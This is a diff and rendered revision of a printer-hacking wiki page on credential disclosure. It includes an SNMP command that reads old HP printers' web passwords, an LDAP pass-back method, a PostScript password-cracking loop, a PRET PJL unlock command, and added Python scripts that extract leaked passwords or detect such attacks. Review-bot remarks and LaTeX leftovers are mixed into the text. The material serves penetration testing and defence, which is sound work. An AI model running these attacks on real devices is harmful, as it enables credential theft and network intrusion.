Difference between revisions of "Credential disclosure"

From Hacking Printers
Line 1: Line 1:
<!--
 
 
 
== Password Disclosure ==
 
== Password Disclosure ==
  
 +
=== SNMP ===
  
Ancient (before 2003) HP printers
+
Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (''.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords'') was even documented by HP. Other vendors may have similar SNMP based issues. Penetration testers may find flaws by studying the various publicly available MIBs which are released by most printer manufacturers.
  
ards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A),
+
'''How to test this attack?'''
JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A)
+
and older.
+
  
-The Jetdirect card is being managed from HP Web Jetadmin.
+
To test this attack, the ''snmpset'' tool can be used as shown below:
  
-A Web Jetadmin "device password" had been set on the JetDirect card.
+
<syntaxhighlight lang=sh>
(This password must be set from Web Jetadmin and has nothing to do with
+
$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
the Telnet password or the SNMP Set community name)
+
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 …
 +
</syntaxhighlight>
  
In the above situation the Web Jetadmin device password is readable as
+
Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes.
plain ASCII tekst from the JetDirect card using SNMP.
+
  
How to check your printers for this vulnerability:
+
'''Who can perform this attack?'''
  
Use an SNMP toolkit to read the following OID from your printer:
+
Anyone who can send network packets to port 161/udp of the printer device.  
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.ne
+
t-
+
printer.generalDeviceStatus.gdPasswords
+
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)
+
  
An example on a Windows machine, using SNMPUTIL from the Windows Resource
+
=== Pass-Back Attacks ===
kit:
+
C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
+
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
+
Value = String
+
<0x41><0x42><0x43><0x44><0x55><0x56><0x3d><0x31><0x30><0x38><0
+
x3b><0x00><0x00><0x00><0x00> ..etc...
+
  
The resulting string reads in ASCII: ABCDEF=108;
+
Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the [[Praeda] tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' <ref>''[http://foofus.net/goons/percx/praeda/pass-back-attack.pdf Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers]'', D. Heiland and M. Belton, 2011</ref>. This works in setups where an MFP verifies users by requesting and external [https://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol LDAP] server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker itself) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests.
The Web Jetadmin device password is the word before the '=' sign, in this
+
 
case: ABCDEF
+
'''How to test this attack?'''
 +
 
 +
Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating.
 +
 
 +
If supported Set the LDAP server in the To test this attack, the ''snmpset'' tool can be used as shown below:
 +
 
 +
<syntaxhighlight lang=sh>
 +
$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
 +
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 …
 +
</syntaxhighlight>
 +
 
 +
Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes.
 +
 
 +
'''Who can perform this attack?'''
 +
 
 +
Anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection.
  
How to protect your printer:
 
  
1. Keep the Web Jetadmin device password EMPTY (don't do this on
 
newer cards than the ones mentioned above)
 
2. Define a 'Set community name' instead
 
  
Additional means of protection (does not address t
 
  
  
  
 +
<!--
 
% \textbf{SNMP}
 
% \textbf{SNMP}
 
% \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}]
 
% \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}]
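Review bot: the new SNMP text ("To test this attack, the ''snmpset'' tool can be used as shown below") names the wrong tool; the transcript that follows runs `snmpget`, and reading the gdPasswords OID is a GET, so the sentence should say snmpget. The pass-back section repeats the mistake and additionally pastes the whole snmpget block and the "Vulnerable devices will return the password..." sentence after the unfinished fragment "If supported Set the LDAP server in the"; that sentence should be completed (the test is changing the LDAP address in the embedded web server, not an SNMP read) and the copied block dropped. Smaller points: `[[Praeda]` lacks its closing bracket, "were" should be "where" and "and external" should be "an external", and `[[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]]` uses internal-link brackets for an external URL and misspells CSRF.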
Line 62: Line 60:
 
% in the early days, saved password often within html source code
 
% in the early days, saved password often within html source code
 
% also: GSOAP and other web services
 
% also: GSOAP and other web services
 +
-->
  
  
  
  
 
 
 
 
 
 
 
 
Lexmark SOAP
 
  
 
\subsection{Credential disclosure}\label{par:eval-credential-disclosure}
 
\subsection{Credential disclosure}\label{par:eval-credential-disclosure}
% obtaining web server passwords through NVRAM dumping or file system access as
+
% obtaining web server passwords through NVRAM dumping or file system access as
  
 
% It is worth emphasizing that the cracking is speed nearly independed of the network latency because
 
% It is worth emphasizing that the cracking is speed nearly independed of the network latency because
Line 86: Line 76:
  
  
Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the \textit{Praeda}\footnote{Heiland, D., \textit{Praeda -- Automated Printer Data Harvesting Tool},\\ \url{http://h.foofus.net/?page_id=218}, Aug. 2016} tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' \cite{heiland2011passback}. This works in setups where an MFP verifies users by requesting and external \acs{LDAP} server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone \mbox{(e.g., the attacker itself)} tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs -- which may  offer insufficient protection -- are therefore a good starting point in network penetration tests.\\
 
  
% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.
 
  
  
Line 101: Line 89:
  
  
 +
% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.
  
  
 +
== Brute-Force Attacks ==
  
 +
Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary.
  
 +
=== PJL ===
  
 
+
PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking.
 
+
 
+
 
+
 
+
 
+
 
+
 
+
 
+
 
+
 
+
== Brute-Force Attacks ==
+
 
+
Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking.
+
  
 
An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords.
 
An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords.
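Review bot: the paragraph placed under the new `=== PJL ===` heading still carries the three PostScript sentences ("PostScript offers two types of passwords ... compared to offline cracking"), so the PJL subsection ends by discussing PostScript key sizes; move those sentences into the `=== PostScript ===` subsection, which already covers the same ground. Also "limited passwords protection" should read "limited password protection" and "both, PJL and PostScript" should lose the comma.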
Line 126: Line 105:
  
 
\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]
 
\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]
@PJL JOB PASSWORD=0
+
@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
+
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
+
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON
+
@PJL DEFAULT CPLOCK=ON
 
\end{lstlisting}
 
\end{lstlisting}
  
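Review bot: the listing keeps the LaTeX `\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]` / `\end{lstlisting}` wrapper, which MediaWiki renders as literal text; the rest of this page wraps code in `<syntaxhighlight lang=...>`, so the four `@PJL` lines should use that and the caption should become a sentence.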
Line 154: Line 133:
 
Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless.
 
Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless.
  
 +
=== PostScript ===
  
PostScript has similar protection mechanisms: The \textit{SystemParamsPassword} is used to change print job settings like paper size while the \textit{StartJobPassword} is required to exit the server loop and therefore permanently alter the PostScript environment. The \texttt{checkpassword} operator which takes either an integer or a string as input checks for both passwords at once \cite{adobe1995supplement}. The key size is very large: PostScript strings can contain arbitrary \acs{ASCII} characters and have a maximal length of 65565 \cite{postscript1999language} which theoretically allows 524,280 bit passwords. On the positive side, \mbox{brute-force} attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:
+
PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below:
 
+
  /min 0 def /max 1000000 def
+
  statusdict begin {
+
    min 1 max
+
    {dup checkpassword {== flush stop} {pop} ifelse} for
+
  } stopped pop
+
  \end{lstlisting}
+
  
 +
<syntaxhighlight lang=postscript>
 +
/min 0 def /max 1000000 def
 +
statusdict begin {
 +
  min 1 max
 +
  {dup checkpassword {== flush stop} {pop} ifelse} for
 +
} stopped pop
 +
\end{lstlisting}
 +
</syntaxhighlight>
  
Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's \acs{RIP} is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords.
+
Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords.
  
 
% on Konica, we can simply DINQUIRE the PASSWORD:
 
% on Konica, we can simply DINQUIRE the PASSWORD:
% 110.143.198.48:/> lock 1
+
% :/> lock 1
 
% PIN protection:  6500
 
% PIN protection:  6500
 
% also not tehat for the dells, the dingquire command showed the password
 
% also not tehat for the dells, the dingquire command showed the password
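Review bot: the new `<syntaxhighlight lang=postscript>` block still ends with the `\end{lstlisting}` line carried over from the LaTeX source, so that stray line is rendered as part of the PostScript program and must be removed. The paragraph also states a maximum string length of 65,565 while the PJL subsection above says 65,535, and the 524,280-bit figure in the same sentence is 65,535 × 8; the two numbers should agree. Smaller points: "attackes" should be "attacker's", and `\autoref{tab:cracking-results}` together with the `\textit{}` markup in the results paragraph are LaTeX leftovers the wiki will not render.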

Revision as of 13:03, 21 January 2017

Password Disclosure

SNMP

Ancient HP printers (manufactured 2003 and earlier) had a bug which allowed an attacker to retrieve the password for the embedded web server through SNMP requests. The vulnerable OID to be requested (.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords) was even documented by HP. Other vendors may have similar SNMP-based issues. Penetration testers may find flaws by studying the various publicly available MIBs released by most printer manufacturers.

How to test this attack?

To test this attack, the snmpget tool (from net-snmp) can be used as shown below:

$ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00

Vulnerable devices return the password as a hexadecimal string (here: AAAAA), while newer devices respond only with zero bytes.

Who can perform this attack?

Anyone who can send network packets to port 161/udp of the printer device.
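The snmpget answer above can be classified programmatically, which is handy when checking a whole fleet. The following Python script is an added example, not code from the Hacking Printers wiki or from PRET: it parses the Hex-STRING (or STRING) line that net-snmp prints for the gdPasswords OID, decodes the NUL-padded ASCII and reports whether the device disclosed a password. The older Web Jetadmin cards in the revision history returned the password followed by "=<number>;", so the text before the first "=" is taken as the password. The response lines used below are constructed; snmpget_command() and check_host() are helper names chosen here.

```python
"""Assess snmpget output for the HP gdPasswords object.
Added example, not code from the Hacking Printers wiki; sample lines are constructed."""
import re
import subprocess

# Numeric form of the documented OID (taken from the page).
GD_PASSWORDS_OID = "1.3.6.1.4.1.11.2.3.9.1.1.13.0"

# net-snmp prints octet strings containing non-printable bytes as
# "Hex-STRING: 41 41 ..." and purely printable ones as 'STRING: "..."'.
HEX_STRING_RE = re.compile(r"Hex-STRING:\s*((?:[0-9A-Fa-f]{2}\s*)+)")
STRING_RE = re.compile(r'STRING:\s*"(.*)"')


def snmpget_command(host: str, community: str = "public") -> list:
    """argv for the SNMPv1 read shown on the page (snmpget from net-snmp)."""
    return ["snmpget", "-v1", "-c", community, host, GD_PASSWORDS_OID]


def response_bytes(line: str) -> bytes:
    """Turn one snmpget output line into the raw octet-string value."""
    m = HEX_STRING_RE.search(line)
    if m:
        return bytes.fromhex(m.group(1).replace(" ", ""))
    m = STRING_RE.search(line)
    if m:
        return m.group(1).encode("latin-1")
    raise ValueError("unrecognised snmpget output: %r" % line)


def assess_gd_passwords(value: bytes) -> dict:
    """Vulnerable firmware returns the password as NUL-padded ASCII, fixed
    firmware returns only zero bytes.  Returns the verdict and, if leaked,
    the password text so the finding can be documented."""
    payload = value.split(b"\x00", 1)[0]      # password ends at the first NUL
    if not payload:
        return {"vulnerable": False, "password": None}
    text = payload.decode("ascii", errors="replace")
    # Web Jetadmin-era cards append "=<number>;" after the password;
    # the password itself is the text before the first '='.
    return {"vulnerable": True, "password": text.split("=", 1)[0]}


def assess_line(line: str) -> dict:
    """Convenience wrapper: snmpget output line -> verdict."""
    return assess_gd_passwords(response_bytes(line))


def check_host(host: str, community: str = "public", timeout: float = 5.0) -> dict:
    """Query a live device and assess the answer (requires net-snmp installed)."""
    proc = subprocess.run(snmpget_command(host, community),
                          capture_output=True, text=True, timeout=timeout)
    if proc.returncode != 0:
        raise RuntimeError(proc.stderr.strip() or "snmpget failed")
    return assess_line(proc.stdout.strip().splitlines()[-1])


if __name__ == "__main__":
    # Constructed output lines: one leaking device, one patched device.
    for sample in ("iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 00 00",
                   "iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 00 00 00 00 00 00 00 00"):
        print(assess_line(sample))
```

A device that answers with anything but zero bytes for this OID should be treated as leaking its web server password; the "password" field is returned so the finding can be reported, and check_host() lets the same logic run against a real address when net-snmp is available.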

Pass-Back Attacks

Printers are commonly deployed with a default password or no initial password at all. In both cases, end users or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the Praeda tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks, where `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' [1]. This works in setups where an MFP verifies users by querying an external LDAP server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone (for example, the attacker themselves) tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may harm more than the device itself once it is integrated into a company's network. Printers and MFPs, which may offer insufficient protection, are therefore a good starting point in network penetration tests.

How to test this attack?

Check if you can change settings like the LDAP hostname in the printer's embedded web server without authenticating.

If supported, set the LDAP server address to a host you control while leaving the stored credentials untouched; as described above, the MFP then sends its original LDAP password to that host the next time someone authenticates.

Who can perform this attack?

Anyone who can access the printer's embedded web server. This may include a CSRF attacker if the web application has no CSRF protection.
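On the network side a pass-back shows up as a printer or MFP opening an LDAP connection to a host that is not the directory server, which is something flow logs can catch. The following Python detector is an added example, not part of the wiki or of Praeda: it assumes a constructed inventory of printer addresses, an allow-list of the real LDAP servers and flow-log lines in a constructed "key=value" format, and it returns every LDAP-port connection from a printer to a non-approved destination.

```python
"""Flag LDAP connections from printers/MFPs to hosts outside the approved
directory servers (added example, not part of the Hacking Printers wiki).
Inventory, allow-list and log lines are constructed for illustration."""
import ipaddress

# Constructed inventory: addresses of the printers/MFPs on the network.
PRINTERS = {ipaddress.ip_address(a) for a in ("10.0.5.21", "10.0.5.22")}
# Constructed allow-list: the only hosts an MFP should ever bind to for LDAP.
APPROVED_LDAP = {ipaddress.ip_address("10.0.1.10")}
# LDAP, LDAPS and the Active Directory global-catalog ports.
LDAP_PORTS = {389, 636, 3268, 3269}

# Constructed flow records (timestamp followed by key=value fields).
SAMPLE_FLOWS = """\
2017-01-21T13:03:01Z src=10.0.5.21 dst=10.0.1.10 dport=389 proto=tcp
2017-01-21T13:03:05Z src=10.0.5.22 dst=203.0.113.7 dport=389 proto=tcp
2017-01-21T13:03:09Z src=10.0.7.3 dst=203.0.113.7 dport=389 proto=tcp
2017-01-21T13:03:12Z src=10.0.5.21 dst=10.0.1.10 dport=443 proto=tcp
2017-01-21T13:03:15Z src=10.0.5.21 dst=10.0.9.50 dport=636 proto=tcp
"""


def parse_flow(line: str) -> dict:
    """Parse one 'ts k=v k=v ...' record into typed fields."""
    ts, *fields = line.split()
    rec = {"ts": ts}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    rec["src"] = ipaddress.ip_address(rec["src"])
    rec["dst"] = ipaddress.ip_address(rec["dst"])
    rec["dport"] = int(rec["dport"])
    return rec


def find_passback_candidates(log_text: str, printers=PRINTERS, approved=APPROVED_LDAP) -> list:
    """Return (ts, printer, destination, port) for every LDAP-port connection
    a printer made to a host that is not an approved directory server.
    A workstation (10.0.7.3) talking to the same rogue host is ignored here;
    only printer-originated binds carry the stored MFP credential."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_flow(line)
        if rec["src"] in printers and rec["dport"] in LDAP_PORTS and rec["dst"] not in approved:
            hits.append((rec["ts"], str(rec["src"]), str(rec["dst"]), rec["dport"]))
    return hits


if __name__ == "__main__":
    for hit in find_passback_candidates(SAMPLE_FLOWS):
        print("possible pass-back: printer %s -> %s:%d at %s" % (hit[1], hit[2], hit[3], hit[0]))
```

The rule is deliberately narrow: it keys on the source being a printer and the destination port being LDAP, so an ordinary HTTPS connection from a printer (the fourth line) and LDAP traffic from non-printers (the third line) produce no alert. In practice the allow-list would come from the directory configuration and the inventory from asset management.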

\subsection{Credential disclosure}\label{par:eval-credential-disclosure}
% obtaining web server passwords through NVRAM dumping or file system access as

% It is worth emphasizing that the cracking speed is nearly independent of the network latency because
% not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter
% AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response).

% even when no feedback mechanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if password is correct, else job is canceled by pjl interpreter).
% instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed.



% While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself.


Brute-Force Attacks

Besides information leaked from sources like the embedded web server, printing languages offer limited password protection mechanisms themselves. Breaking such mechanisms has priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model, they are standardized for both PJL and PostScript. Although it is not very common for end users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers therefore have a motivation to crack or bypass them if necessary.

PJL

PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space [2]. Brute-force attacks as proposed by [3] thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes; however, both passwords are of type string, which means up to 65,535 characters [4]. On the other hand, for simple passwords brute-force is very fast, as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking.

An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords.

In addition to web server passwords, which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size, as demonstrated by \cite{phenoelit2002embedded}, who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having become faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has effectively decreased. The devices in our test printer pool could verify between 50 and 1,000 passwords per second, leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}.

\begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}]

@PJL JOB PASSWORD=0
@PJL DEFAULT PASSWORD=12345
@PJL DEFAULT DISKLOCK=ON
@PJL DEFAULT CPLOCK=ON

\end{lstlisting}


How to test this attack?

./pret.py -q printer pjl
Connection to printer established

 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> unlock

Who can perform this attack?

Anyone who can print, for example through a USB drive or cable, Port 9100 printing or cross-site printing. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job.
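Because the blind variant simply packs thousands of `@PJL DEFAULT PASSWORD=` assignments into one job, the attack has a clear signature in any print job that can be inspected (spooler, print server, network capture). The following Python code is an added example, not from the wiki or from PRET: it parses the PJL assignments of a job such as the lock listing above, checks each password value against the standard's 1 to 65,535 range, and flags a job that cycles through many distinct password values. The sample job is constructed from the listing; parse_pjl(), password_candidates() and is_bruteforce_job() are names chosen here.

```python
"""Parse PJL job headers and flag password brute-force jobs
(added example, not code from the Hacking Printers wiki or from PRET).
The sample job is constructed from the page's lock listing."""
import re

# Universal Exit Language sequence that frames a PJL job.
UEL = "\x1b%-12345X"

# @PJL JOB|DEFAULT|SET <variable> = <value>
PJL_ASSIGN = re.compile(r"^@PJL\s+(JOB|DEFAULT|SET)\s+([A-Z]+)\s*=\s*(\S+)", re.IGNORECASE)

SAMPLE_JOB = (UEL + "@PJL\n"
              "@PJL JOB PASSWORD=0\n"
              "@PJL DEFAULT PASSWORD=12345\n"
              "@PJL DEFAULT DISKLOCK=ON\n"
              "@PJL DEFAULT CPLOCK=ON\n" + UEL)


def parse_pjl(job: str) -> list:
    """Return (command, variable, value) for every PJL assignment in a job."""
    out = []
    for raw in job.replace(UEL, "\n").splitlines():
        m = PJL_ASSIGN.match(raw.strip())
        if m:
            cmd, var, val = m.groups()
            out.append((cmd.upper(), var.upper(), val))
    return out


def in_keyspace(value: str) -> bool:
    """True if the value is a password the PJL standard allows (1..65535);
    0 means 'no password' and anything else is out of spec."""
    return value.isdigit() and 1 <= int(value) <= 65535


def password_candidates(job: str) -> set:
    """Distinct values a job uses as PJL password, either to authorise itself
    (JOB PASSWORD) or to reset the stored password (DEFAULT/SET PASSWORD)."""
    return {val for _, var, val in parse_pjl(job) if var == "PASSWORD"}


def locks_requested(job: str) -> dict:
    """DISKLOCK / CPLOCK settings a job tries to apply."""
    return {var: val for _, var, val in parse_pjl(job) if var in ("DISKLOCK", "CPLOCK")}


def is_bruteforce_job(job: str, threshold: int = 10) -> bool:
    """A legitimate job names one or two password values; a job cycling
    through many is the blind reset the page describes.  The threshold is a
    tuning choice, not a value from the page."""
    return len(password_candidates(job)) >= threshold


if __name__ == "__main__":
    print(parse_pjl(SAMPLE_JOB))
    print("locks:", locks_requested(SAMPLE_JOB))
    print("brute-force job:", is_bruteforce_job(SAMPLE_JOB))
```

A print server or IDS rule built on password_candidates() needs no knowledge of the correct password: the count of distinct values alone separates a normal job from a sweep, and in_keyspace() additionally catches malformed values that some non-compliant firmware (see below) may accept without checking.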

Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable.


Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless.

PostScript

